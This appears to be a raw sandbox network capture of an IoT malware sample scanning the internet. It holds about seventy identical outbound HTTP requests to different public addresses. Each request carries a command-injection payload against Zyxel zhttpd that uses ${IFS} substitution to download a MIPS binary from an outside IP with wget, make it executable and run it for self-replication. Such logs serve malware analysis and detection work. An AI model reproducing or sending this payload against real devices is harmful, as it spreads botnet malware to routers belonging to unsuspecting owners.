                                            Feb 2, 2024 06:21:33.051763058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9673192.168.2.1547602183.92.29.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051803112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9674192.168.2.155164282.110.12.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051831007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9675192.168.2.153459869.49.64.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051863909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9676192.168.2.1532948150.125.20.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051924944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9677192.168.2.155894641.137.232.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051968098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9678192.168.2.1533144193.7.52.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052005053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9679192.168.2.153511289.227.203.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052057981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9680192.168.2.155846495.224.201.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052100897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9681192.168.2.1551266196.184.122.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052128077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9682192.168.2.1560454139.45.106.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052161932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9683192.168.2.1534500192.55.101.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052189112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9684192.168.2.155084235.92.220.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052232027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9685192.168.2.1551302106.229.90.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052269936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9686192.168.2.1534734216.77.233.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052305937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9687192.168.2.1548496122.40.27.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052323103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9688192.168.2.1541198202.246.78.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052393913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9689192.168.2.153847875.229.209.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052405119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9690192.168.2.155152699.133.106.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052443981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9691192.168.2.155076870.76.130.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052493095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9692192.168.2.1539222219.111.24.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052525997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9693192.168.2.154509238.16.101.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052553892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9694192.168.2.154242864.220.154.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052583933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9695192.168.2.1533256211.141.11.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052640915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9696192.168.2.1543446113.249.167.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052695036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9697192.168.2.1557186134.142.0.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052716970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9698192.168.2.1557816124.28.179.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052788973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9699192.168.2.155077498.52.138.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052819967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9700192.168.2.1548940111.236.76.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052849054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9701192.168.2.1535386124.71.100.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052896023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9702192.168.2.154071866.42.34.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052922010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9703192.168.2.1554604170.151.235.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.052983046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9704192.168.2.1552274203.147.252.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053020954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9705192.168.2.153596882.15.115.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053071022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9706192.168.2.1538490117.115.250.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053102970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9707192.168.2.1548444174.13.171.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053124905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9708192.168.2.1544858217.10.251.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053179979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9709192.168.2.155767071.119.110.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053206921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9710192.168.2.154669290.34.136.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053246021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9711192.168.2.1544190201.248.210.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053289890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9712192.168.2.154465020.1.29.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053323984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9713192.168.2.154987024.117.16.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053356886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9714192.168.2.1548150106.78.68.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053385973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9715192.168.2.1550504198.217.109.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053431034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9716192.168.2.1560000120.169.45.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053476095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9717192.168.2.1548806221.27.253.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053540945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9718192.168.2.155475096.192.20.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053553104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9719192.168.2.1555990196.49.9.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053608894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9720192.168.2.155467088.105.227.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053642988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9721192.168.2.1550232147.213.86.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053692102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9722192.168.2.155181275.102.6.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053720951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9723192.168.2.1540216107.230.141.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053741932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9724192.168.2.155604088.38.127.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053806067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9725192.168.2.1555566211.253.240.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053833961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9726192.168.2.155002083.195.138.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053867102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9727192.168.2.156002659.223.122.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053911924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9728192.168.2.1547882202.131.57.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053955078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9729192.168.2.1549588172.207.152.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.053989887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9730192.168.2.1541474100.60.115.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054042101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9731192.168.2.1543022152.146.236.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054085970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9732192.168.2.1535762116.73.248.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054105997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9733192.168.2.1534116182.129.122.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054148912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9734192.168.2.153285813.221.98.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054174900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9735192.168.2.155165636.87.56.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054224014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9736192.168.2.1538638111.89.167.40443
                                            TimestampBytes transferredDirectionData
